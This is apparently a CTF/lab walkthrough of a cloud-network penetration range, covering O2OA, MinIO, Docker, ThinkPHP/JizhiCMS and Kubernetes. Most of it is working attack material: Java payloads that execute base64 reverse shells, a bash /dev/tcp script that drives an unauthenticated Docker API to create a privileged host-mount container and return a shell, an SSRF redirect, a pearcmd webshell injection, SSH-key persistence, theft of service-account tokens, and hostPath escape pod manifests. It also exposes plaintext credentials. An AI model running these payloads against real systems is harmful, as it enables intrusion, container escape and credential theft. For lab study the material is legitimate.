CloudNet

The most detailed walkthrough yet

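Topics covered

O2OA default credentials + admin console RCE

RCE via MinIO data synchronization

MinIO SSRF + container mount escape via the Docker API on port 2375

JizhiCMS (ThinkPHP) multi-language module file inclusion RCE

Reading the Kubernetes SA token from the default path

Kubernetes container mount escape

Harbor image synchronization

Docker privileged escalation

flag1

fscan finds two web services; port 8080 leads straight to the O2OA admin login page.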

start infoscan

39.98.124.136:22 open

39.98.124.136:80 open

39.98.124.136:8080 open

[*] alive ports len is: 3

start vulscan

[*] WebTitle http://39.98.124.136 code:200 len:12592 title:广城市人民医院



[*] WebTitle http://39.98.124.136:8080 code:200 len:282 title:NoneO2 oa后台RCE

O2oa 默认账密 xadmin/o2或xadmin/o2oa@2022



用后者登录进去,在应用——服务管理——代理配置 或 接口配置新建一个代理 或 接口

根据github上的issue,利用该issue的exp无法打通,按作者的意思应该只是过滤了java.lang.Class类,换一个核心类即可

var a = mainOutput();

function mainOutput() {

var classLoader = Java.type("java.lang.ClassLoader");

var systemClassLoader = classLoader.getSystemClassLoader();

var runtimeMethod = systemClassLoader.loadClass("java.lang.Runtime");

var getRuntime = runtimeMethod.getDeclaredMethod("getRuntime");

var runtime = getRuntime.invoke(null);

var exec = runtimeMethod.getDeclaredMethod("exec", Java.type("java.lang.String"));

exec.invoke(runtime, "bash -c {echo,YmFz...MQ==}|{base64,-d}|{bash,-i}");

}

A second variant that goes through the thread context class loader:

var a = mainOutput();

function mainOutput() {

var threadClazz = Java.type("java.lang.Thread");

var classLoader = threadClazz.currentThread().getContextClassLoader();

var rtClazz = classLoader.loadClass("java.lang.Runtime");

var stringClazz = classLoader.loadClass("java.lang.String");

var getRuntimeMethod = rtClazz.getMethod("getRuntime");

var execMethod = rtClazz.getMethod("exec", stringClazz);

var runtimeObj = getRuntimeMethod.invoke(rtClazz);

return execMethod.invoke(runtimeObj, "bash -c {echo,YmFza...MQ==}|{base64,-d}|{bash,-i}");

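}

After writing the script, press Ctrl+S to save. If you use an agent, remember to fill in the cron expression; if you use an interface, remember to disable authentication.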





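Listen on the VPS and catch the shell to get the first flag. There is no curl on the target and the wget one-liner also failed, so I used pwncat to listen and upload a reverse-shell binary.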



flag2



A quick check shows the target is a Docker container

cat /proc/1/cgroup | grep -i docker
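The same check can be sketched in Python. This is a minimal sketch, not the tooling used in this walkthrough: the marker list and both sample strings are my own assumptions, and on hosts using cgroup v2 the file may contain only `0::/`, in which case this heuristic does not help.

```python
def looks_like_container(cgroup_text: str) -> bool:
    """Return True if any cgroup path mentions a known container runtime."""
    markers = ("docker", "kubepods", "containerd")  # assumed marker list
    return any(
        marker in line.lower()
        for line in cgroup_text.splitlines()
        for marker in markers
    )


# Hypothetical /proc/1/cgroup contents, not captured from the target.
container_sample = "12:memory:/docker/0123456789abcdef\n11:cpu:/docker/0123456789abcdef\n"
host_sample = "12:memory:/\n11:cpu:/\n"

print(looks_like_container(container_sample))
print(looks_like_container(host_sample))
```

On a real machine you would pass in the contents of `/proc/1/cgroup` instead of the sample strings.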

minio数据同步RCE



接着回平台,在系统配置-json配置-externalStorageSources (文件存储配置)看到minio的ak-sk以及ip端口

"store": {

"minio": {

"protocol": "min",

"username": "bxBZOXDlizzuujdR",

"password": "TGdtqwJbBrEMhCCMDVtlHKU=",

"host": "172.22.18.29",

"port": 9000,

"name": "o2oa"

}

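},

With a proxy set up, access MinIO and log in. Besides o2oa there is also a portal bucket, and testing shows its site structure matches the web service on port 80 of the entry host. Upload a PHP one-line webshell and wait for MinIO to sync data to the entry host (every ten minutes).

The second flag is on the entry host.

flag3

Get a shell through the webshell and scan the internal network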

start infoscan

trying RunIcmp2

The current user permissions unable to send icmp packets

start ping

(icmp) Target 172.22.18.23 is alive

(icmp) Target 172.22.18.29 is alive

(icmp) Target 172.22.18.64 is alive

(icmp) Target 172.22.18.61 is alive

[*] Icmp alive hosts len is: 4

172.22.18.29:9000 open

172.22.18.23:8080 open

172.22.18.61:80 open

172.22.18.64:80 open

172.22.18.61:22 open

172.22.18.64:22 open

172.22.18.29:22 open

172.22.18.23:80 open

172.22.18.23:22 open

172.22.18.61:10250 open

[*] alive ports len is: 10

start vulscan

[*] WebTitle http://172.22.18.23 code:200 len:12592 title:广城市人民医院

[*] WebTitle http://172.22.18.64 code:200 len:785 title:Harbor

[+] InfoScan http://172.22.18.64 [Harbor]

[*] WebTitle http://172.22.18.23:8080 code:200 len:282 title:None

[*] WebTitle http://172.22.18.29:9000 code:307 len:43 title:None 跳转url: http://172.22.18.29:9000/minio/

[*] WebTitle http://172.22.18.61 code:200 len:8710 title:医院内部平台

[*] WebTitle https://172.22.18.61:10250 code:404 len:19 title:None

[*] WebTitle http://172.22.18.29:9000/minio/ code:200 len:2281 title:MinIO Browser



[+] PocScan http://172.22.18.64/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]

The scan finds Harbor, so a tool can be used to download the Docker image files directly.

python3 harbor.py http://172.22.18.64

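python3 harbor.py http://172.22.18.64/ --dump public/mysql --v2

Alternatively, pull the image directly with docker pull. Besides setting an HTTP/HTTPS proxy for dockerd, you can follow the method from 狗哥's blog and run Clash as a global proxy on Linux. I tried both and both work.

Setting an HTTP/HTTPS proxy for dockerd

Add the following to /etc/systemd/system/docker.service.d/http-proxy.conf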

[Service]

Environment="HTTP_PROXY=socks5://8.138.89.236:10086/"

Setting up a Clash proxy

config.yaml

mixed-port: 7890

allow-lan: false

external-controller: 127.0.0.1:42449

secret: xxx

proxies:

- {name: 'SocksTest', type: socks5, server: socksip, port: socksport}

If the pull fails, add the insecure-registries field to /etc/docker/daemon.json so that Docker is allowed to talk to the specified non-HTTPS private registry (IP 172.22.18.64).

{

"insecure-registries": ["172.22.18.64"]

}

Restart the service after changing the configuration

systemctl daemon-reload

systemctl restart docker

After pulling the image, create a container from it. There is nothing interesting inside, though.

docker pull 172.22.18.64/public/mysql:5.6

docker run -itd --name cloud 172.22.18.64/public/mysql:5.6





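MinIO SSRF + container mount escape via the Docker API on port 2375

So, following 大头师傅's article, the next step is MinIO SSRF plus the Docker API on port 2375: create a malicious container and escape through a host mount.

The mysql container turned out to have neither curl nor wget, so the requests are sent with exec over bash's /dev/tcp. By talking to the Docker daemon API on port 2375, a container is created and started on the target host and a reverse shell command is run inside it. There are four requests in total:

- Request 1: create a container from the 172.22.18.64/public/mysql:5.6 image, mount the host's root directory at /mnt in the container, and run it in privileged mode. The new container's ID is parsed from the Docker daemon's response and saved to /tmp/id for the later steps.

- Request 2: start the container with that ID, i.e. the one created by request 1.

- Request 3: create a new exec instance inside that container (the reverse shell command). The exec instance's ID is parsed from the response and saved to /tmp/id2. This ID is different from the container ID; it identifies this particular exec session.

- Request 4: start that exec instance, which sends back the reverse shell (remember to start an nc listener on the entry host first).

Note that the IP 大头师傅 targets is 172.17.0.1, which is normally the address of the docker0 interface, i.e. the address a container uses to reach its host. In other words, the MinIO service and the Docker API run on the same host, so there is no need to worry about exploiting blind. (In a normal pentest you could also guess that the two services share a host.)

To make testing easier, a reverse shell can be appended at the very end. The entry host then runs two listeners: one for the shell from the escape container created through the Docker API, and one for the shell from the container that executes the Dockerfile (useful for inspecting /tmp/sim.sh, /tmp/id and so on to see how the commands ran).

The ID extraction is also changed from hard-coded values to sed with a regular expression.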

#!/usr/bin/env bash

# 1: create a privileged container with the host root mounted at /mnt, save its ID to /tmp/id

exec 3<>/dev/tcp/172.17.0.1/2375

lines=(

'POST /containers/create HTTP/1.1'

'Host: 172.17.0.1:2375'

'Connection: close'

'Content-Type: application/json'

'Content-Length: 133'

''

'{"HostName":"remoteCreate","User":"root","Image":"172.22.18.64/public/mysql:5.6","HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}'

)

printf '%s\r\n' "${lines[@]}" >&3

while read -r data <&3; do

echo $data

if [[ $data == '{"Id":"'* ]]; then

echo $data | sed -n 's/.*"Id":"\([^"]*\)".*/\1/p' > /tmp/id

fi

done

exec 3>&-

# 2: start the container created in step 1

exec 3<>/dev/tcp/172.17.0.1/2375

lines=(

"POST /containers/`cat /tmp/id`/start HTTP/1.1"

'Host: 172.17.0.1:2375'

'Connection: close'

'Content-Type: application/x-www-form-urlencoded'

'Content-Length: 0'

''

)

printf '%s\r\n' "${lines[@]}" >&3

while read -r data <&3; do

echo $data

done

exec 3>&-

# 3: create an exec instance in that container, save its ID to /tmp/id2

exec 3<>/dev/tcp/172.17.0.1/2375

lines=(

"POST /containers/`cat /tmp/id`/exec HTTP/1.1"

'Host: 172.17.0.1:2375'

'Connection: close'

'Content-Type: application/json'

'Content-Length: 75'

''

'{"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/172.22.18.23/10087 0>&1"]}'

)

printf '%s\r\n' "${lines[@]}" >&3

while read -r data <&3; do

echo $data

if [[ $data == '{"Id":"'* ]]; then

echo $data | sed -n 's/.*"Id":"\([^"]*\)".*/\1/p' > /tmp/id2

fi

done

exec 3>&-

# 4: start the exec instance

exec 3<>/dev/tcp/172.17.0.1/2375

lines=(

"POST /exec/`cat /tmp/id2`/start HTTP/1.1"

'Host: 172.17.0.1:2375'

'Connection: close'

'Content-Type: application/json'

'Content-Length: 27'

''

'{"Detach":true,"Tty":false}'

)

printf '%s\r\n' "${lines[@]}" >&3

while read -r data <&3; do

echo $data

done

exec 3>&-

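# 5: extra shell from the build container itself, for debugging

bash -i >& /dev/tcp/172.22.18.23/8899 0>&1

The 172.17.0.1 address used here can also be replaced with the MinIO host's IP, 172.22.18.29. Testing shows the shell is still received, which means the Docker container can reach its host through that IP as well.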
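Because the script writes raw HTTP by hand, every Content-Length value has to match its JSON body exactly, and the ID has to be cut out of the response line. A minimal Python sketch for double-checking both is shown here. The bodies are copied from the script above; `sample_response` and the helper name `extract_id` are hypothetical and only illustrate the shape of the line the sed expression expects.

```python
import re

# Request bodies copied verbatim from the script above.
bodies = {
    "create": '{"HostName":"remoteCreate","User":"root","Image":"172.22.18.64/public/mysql:5.6","HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}',
    "exec": '{"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/172.22.18.23/10087 0>&1"]}',
    "exec_start": '{"Detach":true,"Tty":false}',
}

# Content-Length counts bytes, so measure the UTF-8 encoded body.
lengths = {name: len(body.encode("utf-8")) for name, body in bodies.items()}
print(lengths)


def extract_id(line: str):
    """Same idea as the sed expression: capture the value of the "Id" key."""
    match = re.search(r'"Id":"([^"]*)"', line)
    return match.group(1) if match else None


# Hypothetical response line, not captured from the target.
sample_response = '{"Id":"abc123","Warnings":[]}'
print(extract_id(sample_response))
```

If you change the listener IP or port in the exec body, rerun the length calculation, since a wrong Content-Length makes the daemon read a truncated or padded body.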

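At this point the entry host acts as the malicious server, and MinIO's request will later be redirected to the Docker API. First, base64-encode the exp above and write it into /var/www/html/Dockerfile on the entry host.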

FROM 172.22.18.64/public/mysql:5.6

RUN echo IyEvdXNyL2Jpbi9lbnYgYmFzaAoKIyAxCmV4ZWMgMzw+L2Rldi90Y3AvMTcyLjIyLjE4LjI5LzIzNzUKbGluZXM9KAogICAgJ1BPU1QgL2NvbnRhaW5lcnMvY3JlYXRlIEhUVFAvMS4xJwogICAgJ0hvc3Q6IDE3Mi4yMi4xOC4yOToyMzc1JwogICAgJ0Nvbm5lY3Rpb246IGNsb3NlJwogICAgJ0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbicKICAgICdDb250ZW50LUxlbmd0aDogMTMzJwogICAgJycKICAgICd7Ikhvc3ROYW1lIjoicmVtb3RlQ3JlYXRlIiwiVXNlciI6InJvb3QiLCJJbWFnZSI6IjE3Mi4yMi4xOC42NC9wdWJsaWMvbXlzcWw6NS42IiwiSG9zdENvbmZpZyI6eyJCaW5kcyI6WyIvOi9tbnQiXSwiUHJpdmlsZWdlZCI6dHJ1ZX19JwopCnByaW50ZiAnJXNcclxuJyAiJHtsaW5lc1tAXX0iID4mMwp3aGlsZSByZWFkIC1yIGRhdGEgPCYzOyBkbwogICAgZWNobyAkZGF0YQogICAgaWYgW1sgJGRhdGEgPT0gJ3siSWQiOiInKiBdXTsgdGhlbgogICAgICAgIGVjaG8gJGRhdGEgfCBzZWQgLW4gJ3MvLioiSWQiOiJcKFteIl0qXCkiLiovXDEvcCcgPiAvdG1wL2lkCiAgICBmaQpkb25lCmV4ZWMgMz4mLQoKIyAyCmV4ZWMgMzw+L2Rldi90Y3AvMTcyLjIyLjE4LjI5LzIzNzUKbGluZXM9KAogICAgIlBPU1QgL2NvbnRhaW5lcnMvYGNhdCAvdG1wL2lkYC9zdGFydCBIVFRQLzEuMSIKICAgICdIb3N0OiAxNzIuMjIuMTguMjk6MjM3NScKICAgICdDb25uZWN0aW9uOiBjbG9zZScKICAgICdDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKICAgICdDb250ZW50LUxlbmd0aDogMCcKICAgICcnCikKcHJpbnRmICclc1xyXG4nICIke2xpbmVzW0BdfSIgPiYzCndoaWxlIHJlYWQgLXIgZGF0YSA8JjM7IGRvCiAgICBlY2hvICRkYXRhCmRvbmUKZXhlYyAzPiYtCgojIDMKZXhlYyAzPD4vZGV2L3RjcC8xNzIuMjIuMTguMjkvMjM3NQpsaW5lcz0oCiAgICAiUE9TVCAvY29udGFpbmVycy9gY2F0IC90bXAvaWRgL2V4ZWMgSFRUUC8xLjEiCiAgICAnSG9zdDogMTcyLjIyLjE4LjI5OjIzNzUnCiAgICAnQ29ubmVjdGlvbjogY2xvc2UnCiAgICAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uJwogICAgJ0NvbnRlbnQtTGVuZ3RoOiA3NScKICAgICcnCiAgICAneyJDbWQiOiBbIi9iaW4vYmFzaCIsICItYyIsICJiYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4yMi4xOC4yMy8xMDMyMSAwPiYxIl19JwopCnByaW50ZiAnJXNcclxuJyAiJHtsaW5lc1tAXX0iID4mMwp3aGlsZSByZWFkIC1yIGRhdGEgPCYzOyBkbwogICAgZWNobyAkZGF0YQogICAgaWYgW1sgJGRhdGEgPT0gJ3siSWQiOiInKiBdXTsgdGhlbgogICAgICAgIGVjaG8gJGRhdGEgfCBzZWQgLW4gJ3MvLioiSWQiOiJcKFteIl0qXCkiLiovXDEvcCcgPiAvdG1wL2lkMgogICAgZmkKZG9uZQpleGVjIDM+Ji0KCiMgNApleGVjIDM8Pi9kZXYvdGNwLzE3Mi4yMi4xOC4yOS8yMzc1CmxpbmVzPSgKICAgICJQT1NUIC9leGVjL2BjYXQgL3R
tcC9pZDJgL3N0YXJ0IEhUVFAvMS4xIgogICAgJ0hvc3Q6IDE3Mi4yMi4xOC4yOToyMzc1JwogICAgJ0Nvbm5lY3Rpb246IGNsb3NlJwogICAgJ0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbicKICAgICdDb250ZW50LUxlbmd0aDogMjcnCiAgICAnJwogICAgJ3siRGV0YWNoIjp0cnVlLCJUdHkiOmZhbHNlfScKKQpwcmludGYgJyVzXHJcbicgIiR7bGluZXNbQF19IiA+JjMKd2hpbGUgcmVhZCAtciBkYXRhIDwmMzsgZG8KICAgIGVjaG8gJGRhdGEKZG9uZQpleGVjIDM+Ji0KCmJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIyLjE4LjIzLzg4OTkgMD4mMQ== | base64 -d > /tmp/sim.sh

RUN chmod +x /tmp/sim.sh && /tmp/sim.sh

Next, create /var/www/html/index.php on the entry host with the following content

<?php

header('Location: http://127.0.0.1:2375/build?remote=http://172.22.18.23/Dockerfile&nocache=true&t=evil:114514', false, 307);

The 307 redirect is used so that the request stays a POST, and the remote parameter tells the Docker API to build an image from a remote URL.
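To see what the redirect target asks the Docker API to do, the URL can be taken apart with Python's standard library. This is only an illustrative sketch. The URL is the one from index.php; the parameter descriptions in the comments follow the Docker Engine API's `/build` endpoint.

```python
from urllib.parse import urlsplit, parse_qs

# Redirect target copied from index.php above.
location = (
    "http://127.0.0.1:2375/build"
    "?remote=http://172.22.18.23/Dockerfile&nocache=true&t=evil:114514"
)

parts = urlsplit(location)
params = parse_qs(parts.query)

print(parts.netloc)  # where the redirected POST is sent
print(parts.path)    # the image build endpoint
print(params)
# remote  -> URL the daemon fetches the build context (here a Dockerfile) from
# nocache -> do not reuse cached layers, so the RUN steps execute every time
# t       -> name:tag given to the resulting image
```

A 301 or 302 would typically be followed as a GET, which is why the status code matters: 307 requires the client to repeat the original method and body.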

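Then delete /var/www/html/index.html on the entry host, otherwise MinIO will hit index.html first instead of index.php. It is best to also delete index.html from the portal bucket in MinIO, or it will reappear on the entry host after the next sync.

Now exploit the MinIO SSRF. Start the listeners on the entry host, set the request's Host header to the entry host's internal IP, and send the request to 172.22.18.29:9000.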

POST /minio/webrpc HTTP/1.1

Host: 172.22.18.23

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36

Content-Type: application/json

Content-Length: 76

{"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}

接收到shell后在挂载目录查看到第三个flag

写ssh公钥维权

echo -e "\n\nssh-rsa AAAAB3NzaC...kwaQ== root@kali\n\n" >> /mnt/root/.ssh/authorized_keysproxychains4 -q ssh root@172.22.18.29这里可以看到通过docker api创建容器逃逸后,连ssh就是minio所在的那台主机



传个fscan验证一下,确实2375端口存在docker api未授权

proxychains4 -q scp -i /root/.ssh/id_rsa fscan root@172.22.18.29:/tmp/

flag4 & flag5 & flag6









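JizhiCMS (ThinkPHP) multi-language module file inclusion RCE

Requesting a non-existent path on http://172.22.18.61 reveals that the site is JizhiCMS, built on the ThinkPHP framework.

It is not clear to me how one would know that the multi-language RCE applies here. Normally, to probe for this bug you check whether the request cookies contain a field like think_lang=zh_cn, which tells you whether ThinkPHP's multi-language feature is enabled.

Capturing traffic on 172.22.18.61 showed no think_lang field in the request headers, and on top of that the lang parameter had to be fuzzed out to be l. Hats off to 大头师傅.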

GET /index.php?l=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=eval($_POST[1]);?>+/var/www/html/sim.php HTTP/1.1

Host: 172.22.18.61

User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1



After connecting with AntSword, the config file reveals the MySQL credentials

'db' =>

array (

'host' => 'mysql',

'dbname' => 'jizhicms',

'username' => 'root',

'password' => 'Mysqlroot@!123',

'prefix' => 'jz_',

'port' => '3306',

)用蚁剑自带数据库连接



不过这里大头师傅说的有些问题,select user();显示的ip并不是mysql服务器所在的ip,而是当前连接的客户端IP,现在是通过web服务器去连接mysql,所以显示的ip应该是极致cms那台的ip

查看mysql数据库主机名

SHOW VARIABLES LIKE 'hostname';

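// mysql-6df876d6dc-f6qfg

Back in the webshell, the host information shows that it runs in Kubernetes. Combined with the hostname, this machine is most likely a container on some node that serves the web application. (172.20.166.134 maps to the hostname web-app-d57c8d67-rm2nk, which also confirms that the earlier IP belongs to the web server rather than the MySQL server.)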

(www-data:/var/www/html) $ cat /etc/hosts

# Kubernetes-managed hosts file.

127.0.0.1 localhost

::1 localhost ip6-localhost ip6-loopback

fe00::0 ip6-localnet

fe00::0 ip6-mcastprefix

fe00::1 ip6-allnodes

fe00::2 ip6-allrouters

172.20.166.134 web-app-d57c8d67-rm2nk默认路径获取 Kubernetes 的sa token



用默认挂载路径读一下token,在mysql用load_file函数读取文件,拿到一个sa token

select load_file("/var/run/secrets/kubernetes.io/serviceaccount/token");

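eyJhbGciOiJSUzI1NiIsImtp.....

Reading the token from the same location on the JizhiCMS web server gives a different value, which confirms that the web and database tiers are separated.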
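A service account token is a JWT, so its middle segment can be decoded offline to see which account it belongs to before trying it against the API server. The sketch below is a minimal illustration under assumptions: the real token is elided above, so `sample_token` is a hypothetical token built in the code itself, and the helper names are mine. The signature is not verified.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs strip off."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def jwt_claims(token: str) -> dict:
    """Return the claims (payload) of a JWT without checking its signature."""
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))


def b64url_encode(obj: dict) -> str:
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Hypothetical token for illustration only; namespace and name are made up.
sample_token = ".".join([
    b64url_encode({"alg": "RS256"}),
    b64url_encode({"sub": "system:serviceaccount:default:example"}),
    "signature-placeholder",
])

claims = jwt_claims(sample_token)
print(claims["sub"])
```

For a real token, the `sub` claim has the form `system:serviceaccount:<namespace>:<name>`, which makes it easy to tell the two tokens apart.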

后续打 Kubernetes 就有好几种打法了

Kubernetes 打法一

kubectl 容器挂载逃逸



上传cdk

https://10.68.0.1指向的就是 Kubernetes API Server,10.68.0.1也是master节点的内部 Cluster IP

目前只有极致cms这台机在 Kubernetes 中,但是如果根据前面猜测这台只是Container的话,那么应该只是把web服务映射到了宿主机的80端口,因此搭正向代理是行不通的(试了Stowaway搭反向代理好像也不通)

因为机子有web服务,所以可以像大头师傅那样用Neo-reGeorg搭反向代理,将tunnel.php上传之后配合proxifier很方便

之后创建kubeconfig

k8s.yaml

apiVersion: v1

kind: Config

clusters:

- name: my-cluster

cluster:

server: https://10.68.0.1/

# certificate-authority: /path/to/ca.crt # 替换为你的 CA 证书路径。如果无需 CA 验证,可删除此行

insecure-skip-tls-verify: true # 如果你想跳过证书验证,请取消此行注释(已修正缩进和空格)

users:

- name: my-user

user:

token: eyJhbGciOiJS...h8g4JQ

contexts:

- name: my-context

context:

cluster: my-cluster

user: my-user



current-context: my-context查询集群节点信息

kubectl --kubeconfig k8s.yaml get nodes

Show detailed information about the master node

kubectl --kubeconfig k8s.yaml describe node master

Use uncordon to mark the master node as schedulable

kubectl --kubeconfig k8s.yaml uncordon master



kubectl can also be given the token directly on the command line

kubectl -s https://10.68.0.1/ --insecure-skip-tls-verify=true --token=eyJhbGciOiJS.... describe nodes

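Next, write a YAML manifest that creates a pod from the 172.22.18.64/public/mysql:5.6 image and mounts node1's root directory at /simho in the container. Adding a toleration for the node.kubernetes.io/unschedulable:NoSchedule taint is a useful precaution.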

pod1.yaml

apiVersion: v1

kind: Pod

metadata:

name: evilpod1

spec:

nodeName: node1 # node2 master

tolerations:

- key: node.kubernetes.io/unschedulable

operator: Exists

effect: NoSchedule

containers:

- name: mycontainer

image: 172.22.18.64/public/mysql:5.6

command: ["/bin/sleep", "3650d"]

volumeMounts:

- name: test

mountPath: /simho

volumes:

- name: test

hostPath:

path: /



type: Directory应用yaml文件,创建容器后跟docker一样直接bash执行命令

kubectl --kubeconfig k8s.yaml apply -f pod1.yaml

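kubectl --kubeconfig k8s.yaml exec -it evilpod1 -- /bin/bash

Repeat the same steps for node2 and the master node. (Why the master node can also be escaped with the mysql image is explained later.)

This yields the fourth, fifth and sixth flags.

Kubernetes approach 2

Container mount escape via the Kubernetes Dashboard

Upload fscan to the JizhiCMS machine and scan all ports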

start infoscan

172.22.18.61:22 open

172.22.18.61:80 open

172.22.18.61:111 open

172.22.18.61:179 open

172.22.18.61:9253 open

172.22.18.61:9353 open

172.22.18.61:10248 open

172.22.18.61:10256 open

172.22.18.61:10250 open

172.22.18.61:10249 open

172.22.18.61:30020 open

172.22.18.61:32686 open

[*] alive ports len is: 12

start vulscan

[*] WebTitle http://172.22.18.61:9353 code:404 len:19 title:None

[*] WebTitle http://172.22.18.61:9253 code:404 len:19 title:None

[*] WebTitle http://172.22.18.61:10249 code:404 len:19 title:None

[*] WebTitle http://172.22.18.61:10256 code:404 len:19 title:None

[*] WebTitle https://172.22.18.61:32686 code:200 len:1422 title:Kubernetes Dashboard

[+] InfoScan https://172.22.18.61:32686 [Kubernetes]

[*] WebTitle http://172.22.18.61:10248 code:404 len:19 title:None

[*] WebTitle http://172.22.18.61 code:200 len:8710 title:医院内部平台

[*] WebTitle https://172.22.18.61:10250 code:404 len:19 title:None

[*] WebTitle http://172.22.18.61:30020 code:200 len:8710 title:医院内部平台

The scan finds the Kubernetes Dashboard on port 32686. (The Dashboard is exposed through a NodePort, which by default is a random port in the 30000-32767 range.)
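As a quick way to spot NodePort services in a scan like this one, the open ports can be filtered against the default NodePort range. This is a small sketch: the port list is copied from the fscan output above, and the range assumes the cluster keeps the default 30000-32767 setting.

```python
# Default NodePort range; a cluster can be configured with a different one.
NODEPORT_RANGE = range(30000, 32768)

# Open ports on 172.22.18.61, copied from the fscan output above.
open_ports = [22, 80, 111, 179, 9253, 9353, 10248, 10256, 10250, 10249, 30020, 32686]

nodeports = [port for port in open_ports if port in NODEPORT_RANGE]
print(nodeports)
```

Here that leaves 30020 (the same page as port 80, judging by the matching length and title in the scan) and 32686 (the Dashboard).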

用mysql服务器或者极致cms服务器读取的token都可以登录,但是用极致那台token进去之后权限很小,基本什么都看不到,mysql服务器读的token权限就很高





这里看到node1节点跟node2节点分别有个pod,一台web服务器,一台mysql服务器,它们的 hostname 正好就是前面那两台



跟前面打法一样,编写yaml,创建一个容器挂载逃逸(node1节点的镜像用 jizhicms 或者 mysql都可以)

apiVersion: v1
kind: Pod
metadata:
  name: simho
spec:
  containers:
  - image: 172.22.18.64/hospital/jizhicms:2.5.0
    name: test-container
    volumeMounts:
    - mountPath: /simho
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

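The Dashboard provides a shell directly. After escaping to the node1 host, the fourth flag is in the root directory.

Repeat with further YAML manifests to escape to node2 and the master node, and read the flags through the Dashboard's built-in shell.

Note: if node2 and the master node keep using 172.22.18.64/hospital/jizhicms:2.5.0 as-is, container creation fails with the error below, because the image is private and cannot be pulled without credentials.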



Failed to pull image "172.22.18.64/hospital/jizhicms:2.5.0": failed to pull and unpack image "172.22.18.64/hospital/jizhicms:2.5.0": failed to resolve reference "172.22.18.64/hospital/jizhicms:2.5.0": pull access denied, repository does not exist or may require authorization: authorization failed: no basic auth credentials

Looking at the existing pod on node1, the Kubernetes Secrets include one named harbor-registry-secret. Adding imagePullSecrets lets the pod authenticate to the private registry and pull the jizhicms:2.5.0 image.

The modified YAML for the mount escape on node2 and the master node

apiVersion: v1
kind: Pod
metadata:
  name: simho6
spec:
  nodeName: master  # or node2
  imagePullSecrets:
  - name: harbor-registry-secret
  tolerations:
  - key: node.kubernetes.io/unschedulable
    operator: Exists
    effect: NoSchedule
  containers:
  - name: mycontainer
    image: 172.22.18.64/hospital/jizhicms:2.5.0
    command: ["/bin/sleep", "3650d"]
    volumeMounts:
    - name: test
      mountPath: /adminsim
  volumes:
  - name: test
    hostPath:
      path: /
      type: Directory





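So why can the mysql:5.6 image be used directly to mount node2 and the master node? The existing pod on node2 was created from mysql:5.6, and its SA is mysql.

Looking further at that mysql account, it is bound to the admin role, which carries a large set of permissions. This explains why the token read from the MySQL server is so privileged, and why both node2 and the master node can be escaped using the mysql:5.6 image.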



flag7



Pick any node host reached through a container escape. Its /etc/hosts lists the node IPs of all three nodes.
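Turning a hosts file into a name-to-IP mapping takes only a few lines. This is a minimal sketch with an assumed helper name, `parse_hosts`. The node host's actual /etc/hosts is not reproduced in this write-up, so the sample below reuses a few lines from the pod's hosts file shown earlier.

```python
def parse_hosts(text: str) -> dict:
    """Map each hostname to the first IP it appears with."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            mapping.setdefault(name, ip)
    return mapping


# Sample taken from the pod's /etc/hosts shown earlier, not from the node host.
sample = """# Kubernetes-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
172.20.166.134 web-app-d57c8d67-rm2nk
"""

hosts = parse_hosts(sample)
print(hosts["web-app-d57c8d67-rm2nk"])
```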

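The node1 host also runs a web service, and it is JizhiCMS as well, so at first I assumed that port 80 on 172.22.18.61 belonged directly to the node1 host.

However, the web directory does not contain the webshell written earlier, and the Dashboard shows the YAML of the JizhiCMS web container, which maps port 80 out.

So, as originally guessed, 172.22.18.61 is the node1 host's IP, but its port 80 serves the web application from the container inside the pod.

With that cleared up, write a public key on the host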

echo -e "\n\nssh-rsa AAAAB3N...waQ== root@kali\n\n" >> /simho/root/.ssh/authorized_keys

proxychains4 -q ssh root@172.22.18.61

Check the network interfaces: one holds the node IP and the other the external IP (external here meaning relative to the Kubernetes environment).

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.22.15.45 netmask 255.255.0.0 broadcast 172.22.255.255

inet6 fe80::216:3eff:fe37:f660 prefixlen 64 scopeid 0x20<link>

ether 00:16:3e:37:f6:60 txqueuelen 1000 (Ethernet)

RX packets 65883 bytes 29270537 (27.9 MiB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 173965 bytes 40294589 (38.4 MiB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.22.18.61 netmask 255.255.0.0 broadcast 172.22.255.255

inet6 fe80::216:3eff:fe37:f614 prefixlen 64 scopeid 0x20<link>

ether 00:16:3e:37:f6:14 txqueuelen 1000 (Ethernet)

RX packets 286612 bytes 279041525 (266.1 MiB)

RX errors 0 dropped 0 overruns 0 frame 0

